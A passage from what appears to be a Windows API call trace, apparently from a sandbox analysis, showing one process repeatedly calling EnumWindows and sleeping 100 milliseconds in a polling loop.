(lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.085] Sleep (dwMilliseconds=0x64) [0205.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.149] Sleep (dwMilliseconds=0x64) [0205.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.224] Sleep (dwMilliseconds=0x64) [0205.301] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.301] Sleep (dwMilliseconds=0x64) [0205.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.368] Sleep (dwMilliseconds=0x64) [0205.383] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.383] Sleep (dwMilliseconds=0x64) [0205.419] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.420] Sleep (dwMilliseconds=0x64) [0205.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.501] Sleep (dwMilliseconds=0x64) [0205.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.557] Sleep (dwMilliseconds=0x64) [0205.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.641] Sleep (dwMilliseconds=0x64) [0205.751] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.751] Sleep (dwMilliseconds=0x64) [0205.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.846] Sleep (dwMilliseconds=0x64) [0205.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0205.938] Sleep (dwMilliseconds=0x64) [0206.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.163] Sleep (dwMilliseconds=0x64) [0206.292] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.292] Sleep (dwMilliseconds=0x64) [0206.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.374] Sleep (dwMilliseconds=0x64) [0206.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.472] Sleep (dwMilliseconds=0x64) [0206.552] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.553] Sleep (dwMilliseconds=0x64) [0206.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.600] Sleep (dwMilliseconds=0x64) [0206.682] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.683] Sleep (dwMilliseconds=0x64) [0206.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.801] Sleep (dwMilliseconds=0x64) [0206.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.873] Sleep (dwMilliseconds=0x64) [0206.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0206.936] Sleep (dwMilliseconds=0x64) [0207.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.065] Sleep (dwMilliseconds=0x64) [0207.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.132] Sleep (dwMilliseconds=0x64) [0207.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.177] Sleep (dwMilliseconds=0x64) [0207.259] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.260] Sleep (dwMilliseconds=0x64) [0207.333] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.333] Sleep (dwMilliseconds=0x64) [0207.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.438] Sleep (dwMilliseconds=0x64) [0207.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.508] Sleep (dwMilliseconds=0x64) [0207.682] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.683] Sleep (dwMilliseconds=0x64) [0207.792] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.792] Sleep (dwMilliseconds=0x64) [0207.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0207.875] Sleep (dwMilliseconds=0x64) [0208.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.045] Sleep (dwMilliseconds=0x64) [0208.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.123] Sleep (dwMilliseconds=0x64) [0208.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.180] Sleep (dwMilliseconds=0x64) [0208.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.232] Sleep (dwMilliseconds=0x64) [0208.312] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.312] Sleep (dwMilliseconds=0x64) [0208.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.384] Sleep (dwMilliseconds=0x64) [0208.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.435] Sleep (dwMilliseconds=0x64) [0208.510] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.511] Sleep (dwMilliseconds=0x64) [0208.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.707] Sleep (dwMilliseconds=0x64) [0208.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.769] Sleep (dwMilliseconds=0x64) [0208.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.834] Sleep (dwMilliseconds=0x64) [0208.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0208.917] Sleep (dwMilliseconds=0x64) [0209.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.048] Sleep (dwMilliseconds=0x64) [0209.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.095] Sleep (dwMilliseconds=0x64) [0209.166] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.166] Sleep (dwMilliseconds=0x64) [0209.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.248] Sleep (dwMilliseconds=0x64) [0209.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.364] Sleep (dwMilliseconds=0x64) [0209.452] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.452] Sleep (dwMilliseconds=0x64) [0209.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.525] Sleep (dwMilliseconds=0x64) [0209.577] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.578] Sleep (dwMilliseconds=0x64) [0209.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.643] Sleep (dwMilliseconds=0x64) [0209.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.718] Sleep (dwMilliseconds=0x64) [0209.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.819] Sleep (dwMilliseconds=0x64) [0209.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.864] Sleep (dwMilliseconds=0x64) [0209.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0209.937] Sleep (dwMilliseconds=0x64) [0210.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.044] Sleep (dwMilliseconds=0x64) [0210.090] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.090] Sleep (dwMilliseconds=0x64) [0210.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.154] Sleep (dwMilliseconds=0x64) [0210.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.226] Sleep (dwMilliseconds=0x64) [0210.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.289] Sleep (dwMilliseconds=0x64) [0210.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.346] Sleep (dwMilliseconds=0x64) [0210.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.469] Sleep (dwMilliseconds=0x64) [0210.558] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.559] Sleep (dwMilliseconds=0x64) [0210.601] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.602] Sleep (dwMilliseconds=0x64) [0210.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.674] Sleep (dwMilliseconds=0x64) [0210.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.751] Sleep (dwMilliseconds=0x64) [0210.822] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.823] Sleep (dwMilliseconds=0x64) [0210.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0210.879] Sleep (dwMilliseconds=0x64) [0211.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.105] Sleep (dwMilliseconds=0x64) [0211.185] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.186] Sleep (dwMilliseconds=0x64) [0211.262] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.263] Sleep (dwMilliseconds=0x64) [0211.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.336] Sleep (dwMilliseconds=0x64) [0211.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.388] Sleep (dwMilliseconds=0x64) [0211.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.542] Sleep (dwMilliseconds=0x64) [0211.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.633] Sleep (dwMilliseconds=0x64) [0211.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.716] Sleep (dwMilliseconds=0x64) [0211.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.790] Sleep (dwMilliseconds=0x64) [0211.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.875] Sleep (dwMilliseconds=0x64) [0211.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.948] Sleep (dwMilliseconds=0x64) [0211.987] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0211.988] Sleep (dwMilliseconds=0x64) [0212.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.102] Sleep (dwMilliseconds=0x64) [0212.214] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.215] Sleep (dwMilliseconds=0x64) [0212.310] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.311] Sleep (dwMilliseconds=0x64) [0212.393] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.397] Sleep (dwMilliseconds=0x64) [0212.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.485] Sleep (dwMilliseconds=0x64) [0212.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.560] Sleep (dwMilliseconds=0x64) [0212.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.620] Sleep (dwMilliseconds=0x64) [0212.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.670] Sleep (dwMilliseconds=0x64) [0212.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.743] Sleep (dwMilliseconds=0x64) [0212.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.782] Sleep (dwMilliseconds=0x64) [0212.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.836] Sleep (dwMilliseconds=0x64) [0212.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.888] Sleep (dwMilliseconds=0x64) [0212.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.930] Sleep (dwMilliseconds=0x64) [0212.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0212.977] Sleep (dwMilliseconds=0x64) [0213.035] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.036] Sleep (dwMilliseconds=0x64) [0213.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.067] Sleep (dwMilliseconds=0x64) [0213.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.106] Sleep (dwMilliseconds=0x64) [0213.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.147] Sleep (dwMilliseconds=0x64) [0213.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.225] Sleep (dwMilliseconds=0x64) [0213.296] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.297] Sleep (dwMilliseconds=0x64) [0213.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.415] Sleep (dwMilliseconds=0x64) [0213.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.735] Sleep (dwMilliseconds=0x64) [0213.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.884] Sleep (dwMilliseconds=0x64) [0213.995] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0213.996] Sleep (dwMilliseconds=0x64) [0214.108] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.113] Sleep (dwMilliseconds=0x64) [0214.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.115] Sleep (dwMilliseconds=0x64) [0214.117] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.117] Sleep (dwMilliseconds=0x64) [0214.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.119] Sleep (dwMilliseconds=0x64) [0214.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.120] Sleep (dwMilliseconds=0x64) [0214.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.122] Sleep (dwMilliseconds=0x64) [0214.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.124] Sleep (dwMilliseconds=0x64) [0214.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.126] Sleep (dwMilliseconds=0x64) [0214.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.128] Sleep (dwMilliseconds=0x64) [0214.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.129] Sleep (dwMilliseconds=0x64) [0214.263] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.264] Sleep (dwMilliseconds=0x64) [0214.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.338] Sleep (dwMilliseconds=0x64) [0214.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.413] Sleep (dwMilliseconds=0x64) [0214.466] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.467] Sleep (dwMilliseconds=0x64) [0214.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.551] Sleep (dwMilliseconds=0x64) [0214.594] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.595] Sleep (dwMilliseconds=0x64) [0214.636] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.637] Sleep (dwMilliseconds=0x64) [0214.677] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.678] Sleep (dwMilliseconds=0x64) [0214.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.717] Sleep (dwMilliseconds=0x64) [0214.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.820] Sleep (dwMilliseconds=0x64) [0214.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.910] Sleep (dwMilliseconds=0x64) [0214.978] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0214.978] Sleep (dwMilliseconds=0x64) [0215.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.057] Sleep (dwMilliseconds=0x64) [0215.134] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.135] Sleep (dwMilliseconds=0x64) [0215.264] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.265] Sleep (dwMilliseconds=0x64) [0215.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.348] Sleep (dwMilliseconds=0x64) [0215.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.426] Sleep (dwMilliseconds=0x64) [0215.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.479] Sleep (dwMilliseconds=0x64) [0215.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.540] Sleep (dwMilliseconds=0x64) [0215.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.615] Sleep (dwMilliseconds=0x64) [0215.724] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.724] Sleep (dwMilliseconds=0x64) [0215.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.809] Sleep (dwMilliseconds=0x64) [0215.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.899] Sleep (dwMilliseconds=0x64) [0215.995] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0215.996] Sleep (dwMilliseconds=0x64) [0216.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.047] Sleep (dwMilliseconds=0x64) [0216.107] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.108] Sleep (dwMilliseconds=0x64) [0216.181] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.181] Sleep (dwMilliseconds=0x64) [0216.286] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.287] Sleep (dwMilliseconds=0x64) [0216.361] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.362] Sleep (dwMilliseconds=0x64) [0216.452] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.452] Sleep (dwMilliseconds=0x64) [0216.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.526] Sleep (dwMilliseconds=0x64) [0216.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.590] Sleep (dwMilliseconds=0x64) [0216.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.663] Sleep (dwMilliseconds=0x64) [0216.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.738] Sleep (dwMilliseconds=0x64) [0216.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.809] Sleep (dwMilliseconds=0x64) [0216.980] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0216.980] Sleep (dwMilliseconds=0x64) [0217.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.114] Sleep (dwMilliseconds=0x64) [0217.186] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.187] Sleep (dwMilliseconds=0x64) [0217.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.276] Sleep (dwMilliseconds=0x64) [0217.329] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.329] Sleep (dwMilliseconds=0x64) [0217.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.464] Sleep (dwMilliseconds=0x64) [0217.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.528] Sleep (dwMilliseconds=0x64) [0217.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.606] Sleep (dwMilliseconds=0x64) [0217.681] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.682] Sleep (dwMilliseconds=0x64) [0217.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.744] Sleep (dwMilliseconds=0x64) [0217.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.791] Sleep (dwMilliseconds=0x64) [0217.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.872] Sleep (dwMilliseconds=0x64) [0217.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0217.946] Sleep (dwMilliseconds=0x64) [0218.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.031] Sleep (dwMilliseconds=0x64) [0218.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.169] Sleep (dwMilliseconds=0x64) [0218.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.291] Sleep (dwMilliseconds=0x64) [0218.371] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.372] Sleep (dwMilliseconds=0x64) [0218.421] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.421] Sleep (dwMilliseconds=0x64) [0218.495] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.495] Sleep (dwMilliseconds=0x64) [0218.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.569] Sleep (dwMilliseconds=0x64) [0218.645] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.646] Sleep (dwMilliseconds=0x64) [0218.721] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.722] Sleep (dwMilliseconds=0x64) [0218.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.794] Sleep (dwMilliseconds=0x64) [0218.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.890] Sleep (dwMilliseconds=0x64) [0218.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0218.966] Sleep (dwMilliseconds=0x64) [0219.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.050] Sleep (dwMilliseconds=0x64) [0219.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.175] Sleep (dwMilliseconds=0x64) [0219.323] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.325] Sleep (dwMilliseconds=0x64) [0219.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.403] Sleep (dwMilliseconds=0x64) [0219.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.489] Sleep (dwMilliseconds=0x64) [0219.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.537] Sleep (dwMilliseconds=0x64) [0219.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.610] Sleep (dwMilliseconds=0x64) [0219.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.674] Sleep (dwMilliseconds=0x64) [0219.714] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.715] Sleep (dwMilliseconds=0x64) [0219.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.791] Sleep (dwMilliseconds=0x64) [0219.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0219.876] Sleep (dwMilliseconds=0x64) [0220.001] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.002] Sleep (dwMilliseconds=0x64) [0220.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.070] Sleep (dwMilliseconds=0x64) [0220.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.173] Sleep (dwMilliseconds=0x64) [0220.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.302] Sleep (dwMilliseconds=0x64) [0220.378] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.379] Sleep (dwMilliseconds=0x64) [0220.492] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.493] Sleep (dwMilliseconds=0x64) [0220.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.550] Sleep (dwMilliseconds=0x64) [0220.572] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.573] Sleep (dwMilliseconds=0x64) [0220.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.606] Sleep (dwMilliseconds=0x64) [0220.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.680] Sleep (dwMilliseconds=0x64) [0220.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.754] Sleep (dwMilliseconds=0x64) [0220.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.853] Sleep (dwMilliseconds=0x64) [0220.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0220.932] Sleep (dwMilliseconds=0x64) [0221.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.030] Sleep (dwMilliseconds=0x64) [0221.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.110] Sleep (dwMilliseconds=0x64) [0221.182] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.183] Sleep (dwMilliseconds=0x64) [0221.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.283] Sleep (dwMilliseconds=0x64) [0221.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.357] Sleep (dwMilliseconds=0x64) [0221.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.430] Sleep (dwMilliseconds=0x64) [0221.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.520] Sleep (dwMilliseconds=0x64) [0221.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.606] Sleep (dwMilliseconds=0x64) [0221.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.729] Sleep (dwMilliseconds=0x64) [0221.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.780] Sleep (dwMilliseconds=0x64) [0221.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.842] Sleep (dwMilliseconds=0x64) [0221.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0221.933] Sleep (dwMilliseconds=0x64) [0222.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.011] Sleep (dwMilliseconds=0x64) [0222.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.063] Sleep (dwMilliseconds=0x64) [0222.137] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.138] Sleep (dwMilliseconds=0x64) [0222.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.241] Sleep (dwMilliseconds=0x64) [0222.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.373] Sleep (dwMilliseconds=0x64) [0222.441] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.442] Sleep (dwMilliseconds=0x64) [0222.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.518] Sleep (dwMilliseconds=0x64) [0222.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.591] Sleep (dwMilliseconds=0x64) [0222.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.663] Sleep (dwMilliseconds=0x64) [0222.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.728] Sleep (dwMilliseconds=0x64) [0222.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.895] Sleep (dwMilliseconds=0x64) [0222.952] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0222.952] Sleep (dwMilliseconds=0x64) [0223.005] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.005] Sleep (dwMilliseconds=0x64) [0223.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.117] Sleep (dwMilliseconds=0x64) [0223.196] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.197] Sleep (dwMilliseconds=0x64) [0223.343] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.344] Sleep (dwMilliseconds=0x64) [0223.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.421] Sleep (dwMilliseconds=0x64) [0223.496] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.496] Sleep (dwMilliseconds=0x64) [0223.555] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.556] Sleep (dwMilliseconds=0x64) [0223.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.566] Sleep (dwMilliseconds=0x64) [0223.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.602] Sleep (dwMilliseconds=0x64) [0223.681] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.682] Sleep (dwMilliseconds=0x64) [0223.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.739] Sleep (dwMilliseconds=0x64) [0223.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.778] Sleep (dwMilliseconds=0x64) [0223.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0223.859] Sleep (dwMilliseconds=0x64) [0223.902] EnumWindows 